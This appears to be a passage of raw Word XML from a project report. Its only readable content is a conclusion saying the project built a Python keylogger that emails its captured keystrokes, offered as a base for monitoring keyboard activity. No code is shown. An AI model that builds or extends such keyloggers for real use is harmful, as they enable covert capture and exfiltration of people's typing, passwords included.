          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E0BA27" w14:textId="77777777" w:rsidR="0037563A" w:rsidRDefault="0037563A" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Conclusion :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03526474" w14:textId="77777777" w:rsidR="0037563A" w:rsidRPr="0037563A" w:rsidRDefault="0037563A" w:rsidP="00F87096">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037563A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The project demonstrates the implementation of a keylogger with email reporting functionality using Python. It serves as a basic foundation for monitoring keyboard activity and can be further enhanced with additional features and improvements.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0037563A" w:rsidRPr="0037563A" w:rsidSect="00A3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B86BF" w14:textId="77777777" w:rsidR="00A3694B" w:rsidRDefault="00A3694B" w:rsidP="00F87096">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A322D3A" w14:textId="77777777" w:rsidR="00A3694B" w:rsidRDefault="00A3694B" w:rsidP="00F8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03C74" w14:textId="77777777" w:rsidR="00A3694B" w:rsidRDefault="00A3694B" w:rsidP="00F87096">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28196FEA" w14:textId="77777777" w:rsidR="00A3694B" w:rsidRDefault="00A3694B" w:rsidP="00F87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96"/>
    <w:rsid w:val="000B74EB"/>
    <w:rsid w:val="000C636B"/>
    <w:rsid w:val="002735A8"/>
    <w:rsid w:val="0037563A"/>
    <w:rsid w:val="00385488"/>
    <w:rsid w:val="00396572"/>
    <w:rsid w:val="00431FD6"/>
    <w:rsid w:val="00477D3B"/>
    <w:rsid w:val="005C72B5"/>
    <w:rsid w:val="006A2E97"/>
    <w:rsid w:val="006D3A22"/>
    <w:rsid w:val="00812700"/>
    <w:rsid w:val="00821C45"/>
    <w:rsid w:val="008801F0"/>
    <w:rsid w:val="00963D6B"/>
    <w:rsid w:val="00982D13"/>
    <w:rsid w:val="009A30BD"/>
    <w:rsid w:val="009D7F77"/>
    <w:rsid w:val="00A3694B"/>
    <w:rsid w:val="00A613EB"/>
    <w:rsid w:val="00B86819"/>
    <w:rsid w:val="00B96B32"/>
    <w:rsid w:val="00C8669F"/>
    <w:rsid w:val="00F45973"/>
    <w:rsid w:val="00F87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0883"/>
  <w15:docId w15:val="{66B6C670-A0F0-48F0-BF21-610E9EE8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96"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F87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96"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0039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Janyaro</dc:creator>
  <cp:lastModifiedBy>Janyaro</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-28T13:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-28T19:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>